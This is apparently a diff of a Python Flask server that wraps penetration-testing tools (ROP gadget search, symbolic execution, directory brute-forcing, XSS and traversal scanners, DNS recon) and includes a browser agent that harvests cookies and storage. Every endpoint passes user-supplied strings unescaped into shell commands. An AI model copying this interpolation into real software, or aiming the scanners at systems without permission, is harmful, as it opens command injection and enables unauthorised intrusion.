/opt/libc-database 2>/dev/null || cd ~/libc-database 2>/dev/null || echo 'libc-database not found'" - + if action == "find": command = f"{base_command} && ./find {symbols}" elif action == "dump": @@ -10552,10 +10552,10 @@ def libc_database(): command = f"{base_command} && ./download {libc_id}" else: return jsonify({"error": f"Invalid action: {action}"}), 400 - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ”ง Starting libc-database {action}: {symbols or libc_id}") result = execute_command(command) logger.info(f"๐Ÿ“Š libc-database {action} completed") @@ -10574,23 +10574,23 @@ def gdb_peda(): attach_pid = params.get("attach_pid", 0) core_file = params.get("core_file", "") additional_args = params.get("additional_args", "") - + if not binary and not attach_pid and not core_file: logger.warning("๐Ÿ”ง GDB-PEDA called without binary, PID, or core file") return jsonify({"error": "Binary, PID, or core file parameter is required"}), 400 - + # Base GDB command with PEDA command = "gdb -q" - + if binary: command += f" {binary}" - + if core_file: command += f" {core_file}" - + if attach_pid: command += f" -p {attach_pid}" - + # Create command script if commands: temp_script = "/tmp/gdb_peda_commands.txt" @@ -10605,21 +10605,21 @@ quit else: # Default PEDA initialization command += " -ex 'source ~/peda/peda.py' -ex 'quit'" - + if additional_args: command += f" {additional_args}" - + target_info = binary or f'PID {attach_pid}' or core_file logger.info(f"๐Ÿ”ง Starting GDB-PEDA analysis: {target_info}") result = execute_command(command) - + # Cleanup if commands and os.path.exists("/tmp/gdb_peda_commands.txt"): try: os.remove("/tmp/gdb_peda_commands.txt") except: pass - + logger.info(f"๐Ÿ“Š GDB-PEDA analysis completed") return jsonify(result) except Exception as e: @@ -10637,14 +10637,14 @@ def angr(): avoid_addresses = params.get("avoid_addresses", "") analysis_type = params.get("analysis_type", "symbolic") # symbolic, cfg, static additional_args = params.get("additional_args", "") - + if not binary: logger.warning("๐Ÿ”ง angr called without binary parameter") return jsonify({"error": "Binary parameter is required"}), 400 - + # Create angr script script_file = "/tmp/angr_analysis.py" - + if script_content: with open(script_file, "w") as f: f.write(script_content) @@ -10693,24 +10693,24 @@ print(f"CFG edges: {len(cfg.graph.edges())}") for func_addr, func in cfg.functions.items(): print(f"Function: {func.name} at {hex(func_addr)}") """ - + with open(script_file, "w") as f: f.write(template) - + command = f"python3 {script_file}" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ”ง Starting angr analysis: {binary}") result = execute_command(command, timeout=600) # Longer timeout for symbolic execution - + # Cleanup try: os.remove(script_file) except: pass - + logger.info(f"๐Ÿ“Š angr analysis completed") return jsonify(result) except Exception as e: @@ -10728,13 +10728,13 @@ def ropper(): arch = params.get("arch", "") # x86, x86_64, arm, etc. search_string = params.get("search_string", "") additional_args = params.get("additional_args", "") - + if not binary: logger.warning("๐Ÿ”ง ropper called without binary parameter") return jsonify({"error": "Binary parameter is required"}), 400 - + command = f"ropper --file {binary}" - + if gadget_type == "rop": command += " --rop" elif gadget_type == "jop": @@ -10743,19 +10743,19 @@ def ropper(): command += " --sys" elif gadget_type == "all": command += " --all" - + if quality > 1: command += f" --quality {quality}" - + if arch: command += f" --arch {arch}" - + if search_string: command += f" --search '{search_string}'" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ”ง Starting ropper analysis: {binary}") result = execute_command(command) logger.info(f"๐Ÿ“Š ropper analysis completed") @@ -10774,25 +10774,25 @@ def pwninit(): ld = params.get("ld", "") template_type = params.get("template_type", "python") # python, c additional_args = params.get("additional_args", "") - + if not binary: logger.warning("๐Ÿ”ง pwninit called without binary parameter") return jsonify({"error": "Binary parameter is required"}), 400 - + command = f"pwninit --bin {binary}" - + if libc: command += f" --libc {libc}" - + if ld: command += f" --ld {ld}" - + if template_type: command += f" --template {template_type}" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ”ง Starting pwninit setup: {binary}") result = execute_command(command) logger.info(f"๐Ÿ“Š pwninit setup completed") @@ -10814,18 +10814,18 @@ def feroxbuster(): wordlist = params.get("wordlist", "/usr/share/wordlists/dirb/common.txt") threads = params.get("threads", 10) additional_args = params.get("additional_args", "") - + if not url: logger.warning("๐ŸŒ Feroxbuster called without URL parameter") return jsonify({ "error": "URL parameter is required" }), 400 - + command = f"feroxbuster -u {url} -w {wordlist} -t {threads}" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ” Starting Feroxbuster scan: {url}") result = execute_command(command) logger.info(f"๐Ÿ“Š Feroxbuster scan completed for {url}") @@ -10844,20 +10844,20 @@ def dotdotpwn(): target = params.get("target", "") module = params.get("module", "http") additional_args = params.get("additional_args", "") - + if not target: logger.warning("๐ŸŽฏ DotDotPwn called without target parameter") return jsonify({ "error": "Target parameter is required" }), 400 - + command = f"dotdotpwn -m {module} -h {target}" - + if additional_args: command += f" {additional_args}" - + command += " -b" - + logger.info(f"๐Ÿ” Starting DotDotPwn scan: {target}") result = execute_command(command) logger.info(f"๐Ÿ“Š DotDotPwn scan completed for {target}") @@ -10876,21 +10876,21 @@ def xsser(): url = params.get("url", "") params_str = params.get("params", "") additional_args = params.get("additional_args", "") - + if not url: logger.warning("๐ŸŒ XSSer called without URL parameter") return jsonify({ "error": "URL parameter is required" }), 400 - + command = f"xsser --url '{url}'" - + if params_str: command += f" --param='{params_str}'" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ” Starting XSSer scan: {url}") result = execute_command(command) logger.info(f"๐Ÿ“Š XSSer scan completed for {url}") @@ -10909,18 +10909,18 @@ def wfuzz(): url = params.get("url", "") wordlist = params.get("wordlist", "/usr/share/wordlists/dirb/common.txt") additional_args = params.get("additional_args", "") - + if not url: logger.warning("๐ŸŒ Wfuzz called without URL parameter") return jsonify({ "error": "URL parameter is required" }), 400 - + command = f"wfuzz -w {wordlist} '{url}'" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ” Starting Wfuzz scan: {url}") result = execute_command(command) logger.info(f"๐Ÿ“Š Wfuzz scan completed for {url}") @@ -10946,19 +10946,19 @@ def dirsearch(): threads = params.get("threads", 30) recursive = params.get("recursive", False) additional_args = params.get("additional_args", "") - + if not url: logger.warning("๐ŸŒ Dirsearch called without URL parameter") return jsonify({"error": "URL parameter is required"}), 400 - + command = f"dirsearch -u {url} -e {extensions} -w {wordlist} -t {threads}" - + if recursive: command += " -r" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ“ Starting Dirsearch scan: {url}") result = execute_command(command) logger.info(f"๐Ÿ“Š Dirsearch scan completed for {url}") @@ -10978,25 +10978,25 @@ def katana(): form_extraction = params.get("form_extraction", True) output_format = params.get("output_format", "json") additional_args = params.get("additional_args", "") - + if not url: logger.warning("๐ŸŒ Katana called without URL parameter") return jsonify({"error": "URL parameter is required"}), 400 - + command = f"katana -u {url} -d {depth}" - + if js_crawl: command += " -jc" - + if form_extraction: command += " -fx" - + if output_format == "json": command += " -jsonl" - + if additional_args: command += f" {additional_args}" - + logger.info(f"โš”๏ธ Starting Katana crawl: {url}") result = execute_command(command) logger.info(f"๐Ÿ“Š Katana crawl completed for {url}") @@ -11015,25 +11015,25 @@ def gau(): include_subs = params.get("include_subs", True) blacklist = params.get("blacklist", "png,jpg,gif,jpeg,swf,woff,svg,pdf,css,ico") additional_args = params.get("additional_args", "") - + if not domain: logger.warning("๐ŸŒ Gau called without domain parameter") return jsonify({"error": "Domain parameter is required"}), 400 - + command = f"gau {domain}" - + if providers != "wayback,commoncrawl,otx,urlscan": command += f" --providers {providers}" - + if include_subs: command += " --subs" - + if blacklist: command += f" --blacklist {blacklist}" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ“ก Starting Gau URL discovery: {domain}") result = execute_command(command) logger.info(f"๐Ÿ“Š Gau URL discovery completed for {domain}") @@ -11051,22 +11051,22 @@ def waybackurls(): get_versions = params.get("get_versions", False) no_subs = params.get("no_subs", False) additional_args = params.get("additional_args", "") - + if not domain: logger.warning("๐ŸŒ Waybackurls called without domain parameter") return jsonify({"error": "Domain parameter is required"}), 400 - + command = f"waybackurls {domain}" - + if get_versions: command += " --get-versions" - + if no_subs: command += " --no-subs" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ•ฐ๏ธ Starting Waybackurls discovery: {domain}") result = execute_command(command) logger.info(f"๐Ÿ“Š Waybackurls discovery completed for {domain}") @@ -11087,25 +11087,25 @@ def arjun(): threads = params.get("threads", 25) stable = params.get("stable", False) additional_args = params.get("additional_args", "") - + if not url: logger.warning("๐ŸŒ Arjun called without URL parameter") return jsonify({"error": "URL parameter is required"}), 400 - + command = f"arjun -u {url} -m {method} -t {threads}" - + if wordlist: command += f" -w {wordlist}" - + if delay > 0: command += f" -d {delay}" - + if stable: command += " --stable" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐ŸŽฏ Starting Arjun parameter discovery: {url}") result = execute_command(command) logger.info(f"๐Ÿ“Š Arjun parameter discovery completed for {url}") @@ -11124,22 +11124,22 @@ def paramspider(): exclude = params.get("exclude", "png,jpg,gif,jpeg,swf,woff,svg,pdf,css,ico") output = params.get("output", "") additional_args = params.get("additional_args", "") - + if not domain: logger.warning("๐ŸŒ ParamSpider called without domain parameter") return jsonify({"error": "Domain parameter is required"}), 400 - + command = f"paramspider -d {domain} -l {level}" - + if exclude: command += f" --exclude {exclude}" - + if output: command += f" -o {output}" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ•ท๏ธ Starting ParamSpider mining: {domain}") result = execute_command(command) logger.info(f"๐Ÿ“Š ParamSpider mining completed for {domain}") @@ -11159,22 +11159,22 @@ def x8(): body = params.get("body", "") headers = params.get("headers", "") additional_args = params.get("additional_args", "") - + if not url: logger.warning("๐ŸŒ x8 called without URL parameter") return jsonify({"error": "URL parameter is required"}), 400 - + command = f"x8 -u {url} -w {wordlist} -X {method}" - + if body: command += f" -b '{body}'" - + if headers: command += f" -H '{headers}'" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ” Starting x8 parameter discovery: {url}") result = execute_command(command) logger.info(f"๐Ÿ“Š x8 parameter discovery completed for {url}") @@ -11194,22 +11194,22 @@ def jaeles(): threads = params.get("threads", 20) timeout = params.get("timeout", 20) additional_args = params.get("additional_args", "") - + if not url: logger.warning("๐ŸŒ Jaeles called without URL parameter") return jsonify({"error": "URL parameter is required"}), 400 - + command = f"jaeles scan -u {url} -c {threads} --timeout {timeout}" - + if signatures: command += f" -s {signatures}" - + if config: command += f" --config {config}" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ”ฌ Starting Jaeles vulnerability scan: {url}") result = execute_command(command) logger.info(f"๐Ÿ“Š Jaeles vulnerability scan completed for {url}") @@ -11230,31 +11230,31 @@ def dalfox(): mining_dict = params.get("mining_dict", True) custom_payload = params.get("custom_payload", "") additional_args = params.get("additional_args", "") - + if not url and not pipe_mode: logger.warning("๐ŸŒ Dalfox called without URL parameter") return jsonify({"error": "URL parameter is required"}), 400 - + if pipe_mode: command = "dalfox pipe" else: command = f"dalfox url {url}" - + if blind: command += " --blind" - + if mining_dom: command += " --mining-dom" - + if mining_dict: command += " --mining-dict" - + if custom_payload: command += f" --custom-payload '{custom_payload}'" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐ŸŽฏ Starting Dalfox XSS scan: {url if url else 'pipe mode'}") result = execute_command(command) logger.info(f"๐Ÿ“Š Dalfox XSS scan completed") @@ -11277,34 +11277,34 @@ def httpx(): web_server = params.get("web_server", False) threads = params.get("threads", 50) additional_args = params.get("additional_args", "") - + if not target: logger.warning("๐ŸŒ httpx called without target parameter") return jsonify({"error": "Target parameter is required"}), 400 - + command = f"httpx -l {target} -t {threads}" - + if probe: command += " -probe" - + if tech_detect: command += " -tech-detect" - + if status_code: command += " -sc" - + if content_length: command += " -cl" - + if title: command += " -title" - + if web_server: command += " -server" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐ŸŒ Starting httpx probe: {target}") result = execute_command(command) logger.info(f"๐Ÿ“Š httpx probe completed for {target}") @@ -11321,19 +11321,19 @@ def anew(): input_data = params.get("input_data", "") output_file = params.get("output_file", "") additional_args = params.get("additional_args", "") - + if not input_data: logger.warning("๐Ÿ“ Anew called without input data") return jsonify({"error": "Input data is required"}), 400 - + if output_file: command = f"echo '{input_data}' | anew {output_file}" else: command = f"echo '{input_data}' | anew" - + if additional_args: command += f" {additional_args}" - + logger.info("๐Ÿ“ Starting anew data processing") result = execute_command(command) logger.info("๐Ÿ“Š anew data processing completed") @@ -11350,16 +11350,16 @@ def qsreplace(): urls = params.get("urls", "") replacement = params.get("replacement", "FUZZ") additional_args = params.get("additional_args", "") - + if not urls: logger.warning("๐ŸŒ qsreplace called without URLs") return jsonify({"error": "URLs parameter is required"}), 400 - + command = f"echo '{urls}' | qsreplace '{replacement}'" - + if additional_args: command += f" {additional_args}" - + logger.info("๐Ÿ”„ Starting qsreplace parameter replacement") result = execute_command(command) logger.info("๐Ÿ“Š qsreplace parameter replacement completed") @@ -11377,22 +11377,22 @@ def uro(): whitelist = params.get("whitelist", "") blacklist = params.get("blacklist", "") additional_args = params.get("additional_args", "") - + if not urls: logger.warning("๐ŸŒ uro called without URLs") return jsonify({"error": "URLs parameter is required"}), 400 - + command = f"echo '{urls}' | uro" - + if whitelist: command += f" --whitelist {whitelist}" - + if blacklist: command += f" --blacklist {blacklist}" - + if additional_args: command += f" {additional_args}" - + logger.info("๐Ÿ” Starting uro URL filtering") result = execute_command(command) logger.info("๐Ÿ“Š uro URL filtering completed") @@ -11411,7 +11411,7 @@ def uro(): class HTTPTestingFramework: """Advanced HTTP testing framework as Burp Suite alternative""" - + def __init__(self): self.session = requests.Session() self.session.headers.update({ @@ -11422,15 +11422,15 @@ class HTTPTestingFramework: self.match_replace_rules = [] # [{'where':'query|headers|body|url','pattern':'regex','replacement':'str'}] self.scope = None # {'host': 'example.com', 'include_subdomains': True} self._req_id = 0 - + def setup_proxy(self, proxy_port: int = 8080): """Setup HTTP proxy for request interception""" self.session.proxies = { 'http': f'http://127.0.0.1:{proxy_port}', 'https': f'http://127.0.0.1:{proxy_port}' } - - def intercept_request(self, url: str, method: str = 'GET', data: dict = None, + + def intercept_request(self, url: str, method: str = 'GET', data: dict = None, headers: dict = None, cookies: dict = None) -> dict: """Intercept and analyze HTTP requests""" try: @@ -11443,7 +11443,7 @@ class HTTPTestingFramework: url, data, send_headers = self._apply_match_replace(url, data, dict(self.session.headers)) if headers: send_headers.update(headers) - + if method.upper() == 'GET': response = self.session.get(url, params=data, headers=send_headers, timeout=30) elif method.upper() == 'POST': @@ -11454,7 +11454,7 @@ class HTTPTestingFramework: response = self.session.delete(url, headers=send_headers, timeout=30) else: response = self.session.request(method, url, data=data, headers=send_headers, timeout=30) - + # Store request/response in history self._req_id += 1 request_data = { @@ -11465,7 +11465,7 @@ class HTTPTestingFramework: 'data': data, 'timestamp': datetime.now().isoformat() } - + response_data = { 'status_code': response.status_code, 'headers': dict(response.headers), @@ -11473,22 +11473,22 @@ class HTTPTestingFramework: 'size': len(response.content), 'time': response.elapsed.total_seconds() } - + self.proxy_history.append({ 'request': request_data, 'response': response_data }) - + # Analyze for vulnerabilities self._analyze_response_for_vulns(url, response) - + return { 'success': True, 'request': request_data, 'response': response_data, 'vulnerabilities': self._get_recent_vulns() } - + except Exception as e: logger.error(f"{ModernVisualEngine.format_error_card('ERROR', 'HTTP-Framework', str(e))}") return {'success': False, 'error': str(e)} @@ -11617,11 +11617,11 @@ class HTTPTestingFramework: 'tested': total, 'interesting': interesting[:50] } - + def _analyze_response_for_vulns(self, url: str, response): """Analyze HTTP response for common vulnerabilities""" vulns = [] - + # Check for missing security headers security_headers = { 'X-Frame-Options': 'Clickjacking protection missing', @@ -11630,7 +11630,7 @@ class HTTPTestingFramework: 'Strict-Transport-Security': 'HTTPS enforcement missing', 'Content-Security-Policy': 'Content Security Policy missing' } - + for header, description in security_headers.items(): if header not in response.headers: vulns.append({ @@ -11640,7 +11640,7 @@ class HTTPTestingFramework: 'url': url, 'header': header }) - + # Check for sensitive information disclosure sensitive_patterns = [ (r'password\s*[:=]\s*["\']?([^"\'\s]+)', 'Password disclosure'), @@ -11648,7 +11648,7 @@ class HTTPTestingFramework: (r'secret\s*[:=]\s*["\']?([^"\'\s]+)', 'Secret disclosure'), (r'token\s*[:=]\s*["\']?([^"\'\s]+)', 'Token disclosure') ] - + for pattern, description in sensitive_patterns: matches = re.findall(pattern, response.text, re.IGNORECASE) if matches: @@ -11659,7 +11659,7 @@ class HTTPTestingFramework: 'url': url, 'matches': matches[:5] # Limit matches }) - + # Check for SQL injection indicators sql_errors = [ 'SQL syntax error', @@ -11668,7 +11668,7 @@ class HTTPTestingFramework: 'Microsoft OLE DB Provider', 'PostgreSQL query failed' ] - + for error in sql_errors: if error.lower() in response.text.lower(): vulns.append({ @@ -11677,13 +11677,13 @@ class HTTPTestingFramework: 'description': f'Potential SQL injection: {error}', 'url': url }) - + self.vulnerabilities.extend(vulns) - + def _get_recent_vulns(self, limit: int = 10): """Get recent vulnerabilities found""" return self.vulnerabilities[-limit:] if self.vulnerabilities else [] - + def spider_website(self, base_url: str, max_depth: int = 3, max_pages: int = 100) -> dict: """Spider website to discover endpoints and forms""" try: @@ -11691,32 +11691,32 @@ class HTTPTestingFramework: forms = [] to_visit = [(base_url, 0)] visited = set() - + while to_visit and len(discovered_urls) < max_pages: current_url, depth = to_visit.pop(0) - + if current_url in visited or depth > max_depth: continue - + visited.add(current_url) - + try: response = self.session.get(current_url, timeout=10) if response.status_code == 200: discovered_urls.add(current_url) - + # Parse HTML for links and forms soup = BeautifulSoup(response.text, 'html.parser') - + # Find all links for link in soup.find_all('a', href=True): href = link['href'] full_url = urljoin(current_url, href) - + if urlparse(full_url).netloc == urlparse(base_url).netloc: if full_url not in visited and depth < max_depth: to_visit.append((full_url, depth + 1)) - + # Find all forms for form in soup.find_all('form'): form_data = { @@ -11725,20 +11725,20 @@ class HTTPTestingFramework: 'method': form.get('method', 'GET').upper(), 'inputs': [] } - + for input_tag in form.find_all(['input', 'textarea', 'select']): form_data['inputs'].append({ 'name': input_tag.get('name', ''), 'type': input_tag.get('type', 'text'), 'value': input_tag.get('value', '') }) - + forms.append(form_data) - + except Exception as e: logger.warning(f"Error spidering {current_url}: {str(e)}") continue - + return { 'success': True, 'discovered_urls': list(discovered_urls), @@ -11746,79 +11746,79 @@ class HTTPTestingFramework: 'total_pages': len(discovered_urls), 'vulnerabilities': self._get_recent_vulns() } - + except Exception as e: logger.error(f"{ModernVisualEngine.format_error_card('ERROR', 'Spider', str(e))}") return {'success': False, 'error': str(e)} class BrowserAgent: """AI-powered browser agent for web application testing and inspection""" - + def __init__(self): self.driver = None self.screenshots = [] self.page_sources = [] self.network_logs = [] - + def setup_browser(self, headless: bool = True, proxy_port: int = None): """Setup Chrome browser with security testing options""" try: chrome_options = Options() - + if headless: chrome_options.add_argument('--headless') - + chrome_options.add_argument('--no-sandbox') chrome_options.add_argument('--disable-dev-shm-usage') chrome_options.add_argument('--disable-gpu') chrome_options.add_argument('--window-size=1920,1080') chrome_options.add_argument('--user-agent=HexStrike-BrowserAgent/1.0 (Security Testing)') - + # Enable logging chrome_options.add_argument('--enable-logging') chrome_options.add_argument('--log-level=0') - + # Security testing options chrome_options.add_argument('--disable-web-security') chrome_options.add_argument('--allow-running-insecure-content') chrome_options.add_argument('--ignore-certificate-errors') chrome_options.add_argument('--ignore-ssl-errors') - + if proxy_port: chrome_options.add_argument(f'--proxy-server=http://127.0.0.1:{proxy_port}') - + # Enable network logging chrome_options.set_capability('goog:loggingPrefs', {'performance': 'ALL'}) - + self.driver = webdriver.Chrome(options=chrome_options) self.driver.set_page_load_timeout(30) - + logger.info(f"{ModernVisualEngine.format_tool_status('BrowserAgent', 'RUNNING', 'Chrome Browser Initialized')}") return True - + except Exception as e: logger.error(f"{ModernVisualEngine.format_error_card('ERROR', 'BrowserAgent', str(e))}") return False - + def navigate_and_inspect(self, url: str, wait_time: int = 5) -> dict: """Navigate to URL and perform comprehensive inspection""" try: if not self.driver: if not self.setup_browser(): return {'success': False, 'error': 'Failed to setup browser'} - + nav_command = f'Navigate to {url}' logger.info(f"{ModernVisualEngine.format_command_execution(nav_command, 'STARTING')}") - + # Navigate to URL self.driver.get(url) time.sleep(wait_time) - + # Take screenshot screenshot_path = f"/tmp/hexstrike_screenshot_{int(time.time())}.png" self.driver.save_screenshot(screenshot_path) self.screenshots.append(screenshot_path) - + # Get page source page_source = self.driver.page_source self.page_sources.append({ @@ -11826,12 +11826,12 @@ class BrowserAgent: 'source': page_source[:50000], # Limit size 'timestamp': datetime.now().isoformat() }) - + # Extract page information page_info = { 'title': self.driver.title, 'url': self.driver.current_url, - 'cookies': [{'name': c['name'], 'value': c['value'], 'domain': c['domain']} + 'cookies': [{'name': c['name'], 'value': c['value'], 'domain': c['domain']} for c in self.driver.get_cookies()], 'local_storage': self._get_local_storage(), 'session_storage': self._get_session_storage(), @@ -11842,7 +11842,7 @@ class BrowserAgent: 'network_requests': self._get_network_logs(), 'console_errors': self._get_console_errors() } - + # Analyze for security issues security_analysis = self._analyze_page_security(page_source, page_info) # Merge extended passive analysis @@ -11851,9 +11851,9 @@ class BrowserAgent: security_analysis['total_issues'] = len(security_analysis['issues']) security_analysis['security_score'] = max(0, 100 - (security_analysis['total_issues'] * 5)) security_analysis['passive_modules'] = extended_passive.get('modules', []) - + logger.info(f"{ModernVisualEngine.format_tool_status('BrowserAgent', 'SUCCESS', url)}") - + return { 'success': True, 'page_info': page_info, @@ -11861,11 +11861,11 @@ class BrowserAgent: 'screenshot': screenshot_path, 'timestamp': datetime.now().isoformat() } - + except Exception as e: logger.error(f"{ModernVisualEngine.format_error_card('ERROR', 'BrowserAgent', str(e))}") return {'success': False, 'error': str(e)} - + # ---------------------- Browser Deep Introspection Helpers ---------------------- def _get_console_errors(self) -> list: """Collect console errors & warnings (if supported)""" @@ -11995,7 +11995,7 @@ class BrowserAgent: """) except: return {} - + def _get_session_storage(self) -> dict: """Extract session storage data""" try: @@ -12009,7 +12009,7 @@ class BrowserAgent: """) except: return {} - + def _extract_forms(self) -> list: """Extract all forms from the page""" forms = [] @@ -12021,7 +12021,7 @@ class BrowserAgent: 'method': form.get_attribute('method') or 'GET', 'inputs': [] } - + inputs = form.find_elements(By.TAG_NAME, 'input') for input_elem in inputs: form_data['inputs'].append({ @@ -12029,13 +12029,13 @@ class BrowserAgent: 'type': input_elem.get_attribute('type') or 'text', 'value': input_elem.get_attribute('value') or '' }) - + forms.append(form_data) except: pass - + return forms - + def _extract_links(self) -> list: """Extract all links from the page""" links = [] @@ -12050,9 +12050,9 @@ class BrowserAgent: }) except: pass - + return links - + def _extract_inputs(self) -> list: """Extract all input elements""" inputs = [] @@ -12067,9 +12067,9 @@ class BrowserAgent: }) except: pass - + return inputs - + def _extract_scripts(self) -> list: """Extract script sources and inline scripts""" scripts = [] @@ -12088,15 +12088,15 @@ class BrowserAgent: }) except: pass - + return scripts - + def _get_network_logs(self) -> list: """Get network request logs""" try: logs = self.driver.get_log('performance') network_requests = [] - + for log in logs[-50:]: # Last 50 logs message = json.loads(log['message']) if message['message']['method'] == 'Network.responseReceived': @@ -12107,15 +12107,15 @@ class BrowserAgent: 'mimeType': response['mimeType'], 'headers': response.get('headers', {}) }) - + return network_requests except: return [] - + def _analyze_page_security(self, page_source: str, page_info: dict) -> dict: """Analyze page for security vulnerabilities""" issues = [] - + # Check for sensitive data in local/session storage for storage_type, storage_data in [('localStorage', page_info.get('local_storage', {})), ('sessionStorage', page_info.get('session_storage', {}))]: @@ -12127,10 +12127,10 @@ class BrowserAgent: 'description': f'Sensitive data found in {storage_type}: {key}', 'location': storage_type }) - + # Check for forms without CSRF protection for form in page_info.get('forms', []): - has_csrf = any('csrf' in input_data['name'].lower() or 'token' in input_data['name'].lower() + has_csrf = any('csrf' in input_data['name'].lower() or 'token' in input_data['name'].lower() for input_data in form['inputs']) if not has_csrf and form['method'].upper() == 'POST': issues.append({ @@ -12139,7 +12139,7 @@ class BrowserAgent: 'description': 'Form without CSRF protection detected', 'form_action': form['action'] }) - + # Check for inline JavaScript inline_scripts = [s for s in page_info.get('scripts', []) if s['type'] == 'inline'] if inline_scripts: @@ -12149,13 +12149,13 @@ class BrowserAgent: 'description': f'Found {len(inline_scripts)} inline JavaScript blocks', 'count': len(inline_scripts) }) - + return { 'total_issues': len(issues), 'issues': issues, 'security_score': max(0, 100 - (len(issues) * 10)) # Simple scoring } - + def close_browser(self): """Close the browser instance""" if self.driver: @@ -12362,82 +12362,82 @@ def burpsuite_alternative(): headless = params.get("headless", True) max_depth = params.get("max_depth", 3) max_pages = params.get("max_pages", 50) - + if not target: return jsonify({"error": "Target parameter is required"}), 400 - + logger.info(f"{ModernVisualEngine.create_section_header('BURP SUITE ALTERNATIVE', '๐Ÿ”ฅ', 'BLOOD_RED')}") scan_message = f'Starting {scan_type} scan of {target}' logger.info(f"{ModernVisualEngine.format_highlighted_text(scan_message, 'RED')}") - + results = { 'target': target, 'scan_type': scan_type, 'timestamp': datetime.now().isoformat(), 'success': True } - + # Phase 1: Browser-based reconnaissance if scan_type in ['comprehensive', 'spider']: logger.info(f"{ModernVisualEngine.format_tool_status('BrowserAgent', 'RUNNING', 'Reconnaissance Phase')}") - + if not browser_agent.driver: browser_agent.setup_browser(headless) - + browser_result = browser_agent.navigate_and_inspect(target) results['browser_analysis'] = browser_result - + # Phase 2: HTTP spidering if scan_type in ['comprehensive', 'spider']: logger.info(f"{ModernVisualEngine.format_tool_status('HTTP-Spider', 'RUNNING', 'Discovery Phase')}") - + spider_result = http_framework.spider_website(target, max_depth, max_pages) results['spider_analysis'] = spider_result - + # Phase 3: Vulnerability analysis if scan_type in ['comprehensive', 'active']: logger.info(f"{ModernVisualEngine.format_tool_status('VulnScanner', 'RUNNING', 'Analysis Phase')}") - + # Test discovered endpoints discovered_urls = results.get('spider_analysis', {}).get('discovered_urls', [target]) vuln_results = [] - + for url in discovered_urls[:20]: # Limit to 20 URLs test_result = http_framework.intercept_request(url) if test_result.get('success'): vuln_results.append(test_result) - + results['vulnerability_analysis'] = { 'tested_urls': len(vuln_results), 'total_vulnerabilities': len(http_framework.vulnerabilities), 'recent_vulnerabilities': http_framework._get_recent_vulns(20) } - + # Generate summary total_vulns = len(http_framework.vulnerabilities) vuln_summary = {} for vuln in http_framework.vulnerabilities: severity = vuln.get('severity', 'unknown') vuln_summary[severity] = vuln_summary.get(severity, 0) + 1 - + results['summary'] = { 'total_vulnerabilities': total_vulns, 'vulnerability_breakdown': vuln_summary, 'pages_analyzed': len(results.get('spider_analysis', {}).get('discovered_urls', [])), 'security_score': max(0, 100 - (total_vulns * 5)) } - + # Display summary with enhanced colors logger.info(f"{ModernVisualEngine.create_section_header('SCAN COMPLETE', 'โœ…', 'SUCCESS')}") vuln_message = f'Found {total_vulns} vulnerabilities' color_choice = 'YELLOW' if total_vulns > 0 else 'GREEN' logger.info(f"{ModernVisualEngine.format_highlighted_text(vuln_message, color_choice)}") - + for severity, count in vuln_summary.items(): logger.info(f" {ModernVisualEngine.format_vulnerability_severity(severity, count)}") - + return jsonify(results) - + except Exception as e: logger.error(f"{ModernVisualEngine.format_error_card('CRITICAL', 'BurpAlternative', str(e))}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -12460,32 +12460,32 @@ def zap(): format_type = params.get("format", "xml") output_file = params.get("output_file", "") additional_args = params.get("additional_args", "") - + if not target and scan_type != "daemon": logger.warning("๐ŸŽฏ ZAP called without target parameter") return jsonify({ "error": "Target parameter is required for scans" }), 400 - + if daemon: command = f"zaproxy -daemon -host {host} -port {port}" if api_key: command += f" -config api.key={api_key}" else: command = f"zaproxy -cmd -quickurl {target}" - + if format_type: command += f" -quickout {format_type}" - + if output_file: command += f" -quickprogress -dir \"{output_file}\"" - + if api_key: command += f" -config api.key={api_key}" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ” Starting ZAP scan: {target}") result = execute_command(command) logger.info(f"๐Ÿ“Š ZAP scan completed for {target}") @@ -12503,18 +12503,18 @@ def wafw00f(): params = request.json target = params.get("target", "") additional_args = params.get("additional_args", "") - + if not target: logger.warning("๐Ÿ›ก๏ธ Wafw00f called without target parameter") return jsonify({ "error": "Target parameter is required" }), 400 - + command = f"wafw00f {target}" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ›ก๏ธ Starting Wafw00f WAF detection: {target}") result = execute_command(command) logger.info(f"๐Ÿ“Š Wafw00f completed for {target}") @@ -12533,21 +12533,21 @@ def fierce(): domain = params.get("domain", "") dns_server = params.get("dns_server", "") additional_args = params.get("additional_args", "") - + if not domain: logger.warning("๐ŸŒ Fierce called without domain parameter") return jsonify({ "error": "Domain parameter is required" }), 400 - + command = f"fierce --domain {domain}" - + if dns_server: command += f" --dns-servers {dns_server}" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ” Starting Fierce DNS recon: {domain}") result = execute_command(command) logger.info(f"๐Ÿ“Š Fierce completed for {domain}") @@ -12567,24 +12567,24 @@ def dnsenum(): dns_server = params.get("dns_server", "") wordlist = params.get("wordlist", "") additional_args = params.get("additional_args", "") - + if not domain: logger.warning("๐ŸŒ DNSenum called without domain parameter") return jsonify({ "error": "Domain parameter is required" }), 400 - + command = f"dnsenum {domain}" - + if dns_server: command += f" --dnsserver {dns_server}" - + if wordlist: command += f" --file {wordlist}" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ” Starting DNSenum: {domain}") result = execute_command(command) logger.info(f"๐Ÿ“Š DNSenum completed for {domain}") @@ -12603,13 +12603,13 @@ def install_python_package(): params = request.json package = params.get("package", "") env_name = params.get("env_name", "default") - + if not package: return 